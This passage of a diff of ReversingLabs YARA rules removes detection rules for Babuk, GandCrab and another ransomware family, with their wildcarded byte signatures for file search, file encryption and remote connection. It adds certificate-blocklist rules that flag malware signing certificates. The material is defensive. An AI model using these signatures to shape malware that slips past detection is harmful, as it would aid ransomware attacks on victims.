?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ?? - 85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1 - ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? - ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? - 81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? - ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89 - 45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ?? - 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 - ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B - 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 - } - condition: - uint16(0)==0x5A4D and ($search_files and ( all of ($encrypt_files_*)) and $remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE { meta: - description = "Yara rule that detects Babuk ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8a96f400-193f-5fd1-ba03-4da464345e1c" - date = "2021-01-26" - modified = "2021-01-26" + id = "5c028a6c-890c-54f1-aea2-ac04ce654907" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13638-L13654" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Babuk" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B - 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? - ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B - 0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? - ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? - 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83 - C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? - ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ?? - EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? - ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 50 FF 15 - } - $encrypt_files_p1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD - ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? - ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B - 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D - ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? - 83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 - } - $encrypt_files_p2 = { - E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? - 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 - FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ?? - ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? - ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? - ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - } - $encrypt_files_p3 = { - C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45 - ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF - 15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? - ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A - ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? - ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ?? - ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ?? - 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? - ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $enum_resources = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 - ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? - ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B - 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB - ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33 - CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($enum_resources) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sivi Technology Limited" and pe.signatures[i].serial=="22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE { meta: - description = "Yara rule that detects GandCrab ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190" - date = "2020-07-15" - modified = "2020-07-15" + id = "9820112d-d59b-57e7-ae78-7b427f70d529" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13656-L13672" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc" score = 75 - quality = 88 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + quality = 90 + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GandCrab" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0 - 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? - 57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? - 8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6 - 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D - 85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ?? - FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85 - C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74 - ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $remote_connection_v2 = { - 55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 - ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 - FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 - ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F - 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 - ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF - 15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 - EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ?? - ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 - ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 - 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? - FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? - ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $crypt_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50 - 83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B - F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5 - ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ?? - 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ?? - ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF - 75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ?? - 8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57 - 8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50 - E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6 - 89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 - ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF - D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ?? - 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C - 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? - ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF - D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 - 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ?? - 83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44 - 24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ?? - ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ?? - 50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44 - 24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9 - ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B - 7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? - 8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ?? - ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74 - ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? - E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B - C6 5E 5B 8B E5 5D C3 - } - $crypt_files_v2 = { - 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52 - FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ?? - FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ?? - ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? - ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C - 24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03 - 44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B - 7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07 - 47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C - 24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 - ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ?? - ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 